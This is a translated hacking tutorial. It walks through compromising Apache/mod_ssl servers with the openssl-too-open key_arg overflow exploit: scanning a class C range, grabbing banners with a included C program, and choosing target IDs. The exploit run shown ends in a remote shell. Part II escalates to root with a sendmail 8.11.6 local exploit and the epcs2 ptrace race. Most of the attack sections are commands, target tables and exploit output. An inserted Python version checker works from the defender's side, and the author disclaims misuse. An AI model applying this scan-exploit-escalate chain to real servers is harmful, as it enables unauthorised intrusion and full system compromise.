Apache/OpenSSL exploitation and privilege escalation
--Nightcat. When reprinting, please keep the article intact.

Part I: Getting the shell
After browsing PacketStorm for a while I came across an exploit package, openssl-too-open.tar.gz. Its description reads: "Remote exploit for OpenSSL v0.9.6d and below on Apache/mod_ssl servers, which takes advantage of the key_arg overflow. Tested against most major Linux distributions. Gives a remote nobody shell on Apache and remote root on other servers. Includes an OpenSSL vulnerability scanner which is more reliable than the RUS-CERT scanner and a detailed vulnerability analysis."

So this exploit targets the key_arg overflow in OpenSSL 0.9.6 and earlier. Pay attention to the Apache/mod_ssl version information as well: most combinations of these versions can be overflowed, giving a shell as nobody and in some cases even root. The package also ships a scanner alongside the exploit.
It sounds very attractive, so I downloaded it to study.

nightcat@nightcat$ tar -zxvf openssl-too-open.tar.gz
nightcat@nightcat$ cd openssl-too-open
nightcat@nightcat$ ls
Makefile  README  linux-x86.c  main.c  main.h  scanner.c  ssl2.c  ssl2.h

I am in the habit of reading a package's README first.

nightcat@nightcat$ more README

It gives some useful information:

1. Compiling: just run make, which produces openssl-too-open and openssl-scanner.
2. openssl-too-open usage:

Usage: ./openssl-too-open [options]
  -a      target architecture (default is 0x00)
  -p      SSL port (default is 443)
  -c n    open n apache connections before sending the shellcode (default is 30)
  -m n    maximum number of open connections (default is 50)
  -v      verbose mode

Supported architectures:
  0x00 - Gentoo (apache-1.3.24-r2)
  0x01 - Debian Woody GNU/Linux 3.0 (apache-1.3.26-1)
  0x02 - Slackware 7.0 (apache-1.3.26)
  0x03 - Slackware 8.1-stable (apache-1.3.26)
  0x04 - RedHat Linux 6.0 (apache-1.3.6-7)
  0x05 - RedHat Linux 6.1 (apache-1.3.9-4)
  0x06 - RedHat Linux 6.2 (apache-1.3.12-2)
  0x07 - RedHat Linux 7.0 (apache-1.3.12-25)
  0x08 - RedHat Linux 7.1 (apache-1.3.19-5)
  0x09 - RedHat Linux 7.2 (apache-1.3.20-16)
  0x0a - RedHat Linux 7.2 (apache-1.3.26 w/PHP)
  0x0b - RedHat Linux 7.3 (apache-1.3.23-11)
  0x0c - SuSE Linux 7.0 (apache-1.3.12)
  0x0d - SuSE Linux 7.1 (apache-1.3.17)
  0x0e - SuSE Linux 7.2 (apache-1.3.19)
  0x0f - SuSE Linux 7.3 (apache-1.3.20)
  0x10 - SuSE Linux 8.0 (apache-1.3.23-137)
  0x11 - SuSE Linux 8.0 (apache-1.3.23)
  0x12 - Mandrake Linux 7.1 (apache-1.3.14-2)
  0x13 - Mandrake Linux 8.0 (apache-1.3.19-3)
  0x14 - Mandrake Linux 8.1 (apache-1.3.20-3)
  0x15 - Mandrake Linux 8.2 (apache-1.3.23-4)

/**** Look at the system type and Apache version. If it is 0x07 - RedHat Linux 7.0 (apache-1.3.12-25), then ./openssl-too-open -a 0x07 ip should do it! ****/
3. openssl-scanner usage:

Usage: ./openssl-scanner [options]
  -i      file with target hosts
  -o      output log
  -a      append to output log (requires -o)
  -b      check for big endian servers
  -c      scan the entire class C network the host belongs to
  -d      debug mode
  -w n    connection timeout in seconds

Examples:
  ./openssl-scanner -d 192.168.0.1
  ./openssl-scanner -i hosts -o my.log -w 5
  ./openssl-scanner -c 192.168.0.0

/**** To scan a class C range: ./openssl-scanner -c 192.168.0.0 ****/
4. A worked example from the README:

$ ./openssl-scanner -c 192.168.0.0
: openssl-scanner : OpenSSL vulnerability scanner
  by Solar Eclipse

Done waiting for all connections......
192.168.0.136: Vulnerable

$ nc 192.168.0.1 80
HEAD / HTTP/1.0

HTTP/1.1 200 OK
Date: Tue, 17 Sep 2002 17:47:44 GMT
Server: Apache-AdvancedExtranet-Server/1.3.20 (Mandrake Linux/3mdk) mod_ssl/2.8.4 OpenSSL/0.9.6b
Connection: close
Content-Type: text/html

$ ./openssl-too-open -a 0x14 192.168.0.1
: openssl-too-open : OpenSSL remote exploit
  by Solar Eclipse

: Opening 30 connections
  Establishing SSL connections

: Using the OpenSSL info leak to retrieve the addresses
  ssl0 : 0x810b3a0
  ssl1 : 0x810b360
  ssl2 : 0x810b4e0

* Addresses don't match.

: Opening 40 connections
  Establishing SSL connections

: Using the OpenSSL info leak to retrieve the addresses
  ssl0 : 0x8103830
  ssl1 : 0x80fd668
  ssl2 : 0x80fd668

* Addresses don't match.

: Opening 50 connections
  Establishing SSL connections

: Using the OpenSSL info leak to retrieve the addresses
  ssl0 : 0x8103830
  ssl1 : 0x8103830
  ssl2 : 0x8103830

: Sending shellcode
ciphers: 0x8103830   start_addr: 0x8103770   shellcode_ofs: 184
  Reading tag
  Execution of stage1 shellcode succeeded, sending stage2
  Spawning shell...

bash: no job control in this shell
bash-2.05$
bash-2.05$ uname -a; id; w;
Linux localhost.localdomain 2.4.8-26mdk #1 Sun Sep 23 17:06:39 CEST 2001 i686 unknown
uid=48(apache) gid=48(apache) groups=48(apache)
 1:49pm  up 4:26,  1 user,  load average: 0.04, 0.07, 0.07
USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU  WHAT
bash-2.05$

Having read the whole README, the procedure is now clear:
1. Run openssl-scanner against a class C range to find a host with the vulnerability.
2. Grab the banner to learn three things about the target: the Apache version, the OpenSSL version and the operating system version.
3. Run openssl-too-open with the matching target ID to overflow the server and get a shell.
For the second step I wrote a small program that fetches the banner:

/*
 * the www banner scanner - 80scanner version 1.0
 *
 * Connects to the given host on port 80 and prints the HTTP HEAD response,
 * so the Server banner (Apache / mod_ssl / OpenSSL versions) can be read.
 *
 * To compile:
 *   user$ gcc -o 80scanner 80scanner.c
 *
 * To use:
 *   user$ ./80scanner somedomain.com   (ie ./80scanner antionline.com)
 *
 * code by nightcat
 * MARCH 2004
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>

int main(int argc, char *argv[])
{
    int s;
    ssize_t n;
    struct sockaddr_in victim;
    struct hostent *bad;
    char buffer[1024];
    const char *request = "HEAD / HTTP/1.0\r\n\r\n";

    if (argc != 2) {
        printf("\nUsage: %s domain.com\n", argv[0]);
        exit(1);
    }
    /* resolve the host name given on the command line */
    if ((bad = gethostbyname(argv[1])) == NULL) {
        printf("Error getting hostname\n");
        exit(1);
    }
    printf("Check Web Server Version\n");
    printf("Coded By Nightcat\n");
    sleep(2);

    s = socket(AF_INET, SOCK_STREAM, 0);
    if (s < 0) {
        perror("socket");
        exit(1);
    }
    memset(&victim, 0, sizeof(victim));
    memcpy(&victim.sin_addr, bad->h_addr, bad->h_length);
    victim.sin_family = AF_INET;
    victim.sin_port = htons(80);

    if (connect(s, (struct sockaddr *)&victim, sizeof(victim)) < 0) {
        perror("connect");
        exit(1);
    }
    printf("\nGetting Http Version\n\n");
    /* a HEAD request returns only the headers, which is all we need */
    send(s, request, strlen(request), 0);
    n = recv(s, buffer, sizeof(buffer) - 1, 0);
    if (n < 0) {
        perror("recv");
        exit(1);
    }
    buffer[n] = '\0';   /* recv() does not NUL-terminate the data */
    printf("Version:\n%s", buffer);
    close(s);
    return 0;
}

It compiles as-is on Linux:

nightcat@nightcat$ ./80scanner www.host.com (172.19.168.1)
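As an added example (not part of the original article or of the openssl-too-open package), the following Python script does the version check that step 2 implies, from the defender's side: it pulls the Server header out of a HEAD response like the one above and compares the advertised OpenSSL version against 0.9.6e, the release that fixed the SSLv2 key_arg overflow. The sample responses are constructed; the first mirrors the banner shown on this page.

```python
import re

# Release that fixed the SSLv2 key_arg overflow; stated as an assumption in the lead-in.
FIXED_OPENSSL = "0.9.6e"

# Matches the OpenSSL token mod_ssl appends to the Server header, e.g. "OpenSSL/0.9.6b".
OPENSSL_TOKEN = re.compile(r"OpenSSL/(\d+\.\d+\.\d+[a-z]*)")

def parse_server_header(raw_response):
    """Return the Server header value from a raw HTTP response, or None."""
    for line in raw_response.splitlines():
        if line.lower().startswith("server:"):
            return line.split(":", 1)[1].strip()
    return None

def openssl_version_key(version):
    """Sortable key for 0.9.x-style versions: '0.9.6b' -> ((0, 9, 6), 'b').
    A bare '0.9.7' sorts before '0.9.7a', matching OpenSSL's lettered releases."""
    m = re.fullmatch(r"(\d+)\.(\d+)\.(\d+)([a-z]*)", version)
    if not m:
        raise ValueError("unrecognised OpenSSL version: %r" % version)
    return (tuple(int(x) for x in m.groups()[:3]), m.group(4))

def check_banner(raw_response):
    """Classify a HEAD response as 'vulnerable', 'patched' or 'unknown'."""
    server = parse_server_header(raw_response)
    if server is None:
        return "unknown"
    m = OPENSSL_TOKEN.search(server)
    if m is None:
        return "unknown"  # no OpenSSL token: mod_ssl absent or ServerTokens trimmed
    if openssl_version_key(m.group(1)) < openssl_version_key(FIXED_OPENSSL):
        return "vulnerable"
    return "patched"

# Constructed sample responses; the first mirrors the banner shown on this page.
SAMPLE_OLD = ("HTTP/1.1 200 OK\r\nDate: Tue, 17 Sep 2002 17:47:44 GMT\r\n"
              "Server: Apache-AdvancedExtranet-Server/1.3.20 (Mandrake Linux/3mdk) "
              "mod_ssl/2.8.4 OpenSSL/0.9.6b\r\nConnection: close\r\n\r\n")
SAMPLE_NEW = "HTTP/1.1 200 OK\r\nServer: Apache/1.3.27 (Unix) mod_ssl/2.8.12 OpenSSL/0.9.6g\r\n\r\n"
SAMPLE_QUIET = "HTTP/1.1 200 OK\r\nServer: Apache\r\n\r\n"

if __name__ == "__main__":
    for name, resp in (("old", SAMPLE_OLD), ("new", SAMPLE_NEW), ("quiet", SAMPLE_QUIET)):
        print(name, check_banner(resp))
```

Distributions that backported the fix without bumping the version string will still show as "vulnerable" here, so treat the result as a triage hint and confirm against the installed package version.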
Part II: Escalating privileges

Our goal is not just a shell as nobody, it is root. Since we already know the target's operating system from step 2, we can get root with a local exploit; there are plenty of these.
For Red Hat systems I will introduce two. The first is a local root exploit for Sendmail.

1. Vulnerability description (from the exploit's own header):

/*
 * Local exploit for sendmail 8.11.6
 * by sorbo (sorbox@yahoo.com)
 * http://www.darkircop.org
 *
 * This exploit takes advantage of the vulnerable prescan() function that
 * allows the user to input 0xff in order to skip the length check of the buffer.
 *
 * The vulnerability was found by Michal Zalewski
 *
 * The goal is to overwrite the 2 LSB of the saved frame pointer and make it
 * point to an area we control.
 *
 * We can overflow pvpbuf[] in parseaddr() (which calls prescan()) and overwrite
 * parseaddr's saved frame pointer.
 * When parseaddr() returns, the control is back to sendtolist() but the frame pointer
 * will be modified (we make it point to somewhere in pvpbuf).
 * We can not just fill pvpbuf with the ret value we want, since sendtolist() does not
 * exit right away, but instead makes use of some variables.
 * We need therefore to construct pvpbuf in an intelligent way, so references to variables
 * will be valid. The first variable to set is delimptr (located at ebp - something).
 * We simply make this point to a 0, so the for loop exits.
 * The next variable to set is al (located at ebp - something). We need to make a->q_next
 * point to 0 so the while loop exits. a->q_next is a + 11*4.
 * The next variable is e (ebp + something). We make it point to a 0.
 * The next variable is bufp (ebp - something). This needs to be equal to buf to skip the free().
 * This cannot be done since the address contains a 0xff and this cannot be input in pvpbuf.
 * We just make it point to a valid chunk (in our ... our chunk). We can't make it point
 * to stack since arena_for_ptr() will fail. Luckily our arguments get copied on the heap, so we
 * just point it to that.
 * Next we just set the ret (ebp + 4) to our shellcode and when sendtolist() exits our
 * shellcode will be executed. Note shellcode is even copied on heap, so non executable stacks will not
 * stop the exploit (the ret addr must match the shellcode location on the heap though).
 *
 * Note that if we overflow ebp by only one byte (putting a 0), ie the classical way,
 * it will not work since the register will not point to pvpbuf. What we do is overwrite two
 * bytes with 0x005c. Then we fill up the stack (by passing a long argument) so we lower the
 * address of pvpbuf until it is in the range of the ebp. Also our shellcode will be at a low
 * stack address < 0xbffefefe (since we can not write 0xff in pvpbuf).
 *
 * Note: Sendmail 8.12.8 cannot be exploited this way since there is an assert() which cannot
 * be bypassed.
 *
 * Have fun
 *
 * Greetz: Knight420, Stefano Biondi, nevez
 *
 */

In short, it relies on the length-check problem in the prescan() function.

2. Detailed usage:

local sendmail 8.11.6 exploit by sorbo (sorbox@yahoo.com)
usage: ./sendmail
  -h      this lame message
  -t      target
  -b      brute force

ID   description     pvpbuf       zero         chunk       shellcode addr
0)   Slackware 8.0   0xbffdfef4   0xbffe15d6   0x80f30a0   0xbffe1f36
1)   redhat 7.3      0xbffdfcd0   0xbffe19a6   0x80f30a0   0xbffe1f36
2)   redhat 7.2      0xbffdfcd0   0xbffe19a6   0x80f30a0   0xbffe1f36

If the target is Red Hat 7.2, simply running ./sendmail -b -t 2 gets root.
The other is epcs2.c.

1. Vulnerability description (from the exploit's own header):

/*
 * epcs2 (improved by lst [liquid@dqc.org])
 * ~~~~~~~
 * Exploit for execve/ptrace race condition in linux kernel up to 2.2.18
 *
 * Originally by:
 * (c) 2001 Wojciech Purczynski / cliph / dqc.org]
 * Props to Kevin for most of the work
 *
 * Now works on stack non-exec systems with some neat trickery for the automated
 * method, ie. no need to find the bss segment via objdump
 *
 * particularly it now rewrites the code instruction sets in the
 * dynamic linker _start segment and continues execution from there.
 *
 * an aside, due to the fact that the code self-modified, it wouldn't work
 * quite correctly on a stack non-exec system without playing directly with
 * the bss segment (ie no regs.eip = regs.esp change). this is much more
 * automated. however, do note that the previous version did not trigger stack
 * non-exec warnings due to how it is operating. Note that the regs.eip = regs.esp
 * method will break on stack non-exec systems.
 *
 * as always .. enjoy.
 *
 */

It simply uses the execve/ptrace race condition.

2. Usage:

 * Usage:
 *      ./epcs [victim]

It is run directly: ./epcs gets root. If "enjoy" appears, you have it.
Part III: Summary

/***** Try to understand everything you can: understand how the tools you use work, and learn why they work at all. That is our real purpose. Intrusion is only a way of understanding the truth. Do not use what I have introduced here to do damage; that is not why I wrote this article. *****/

Contact me: QQ: 1043931  E-mail: ncnynl@hotmail.com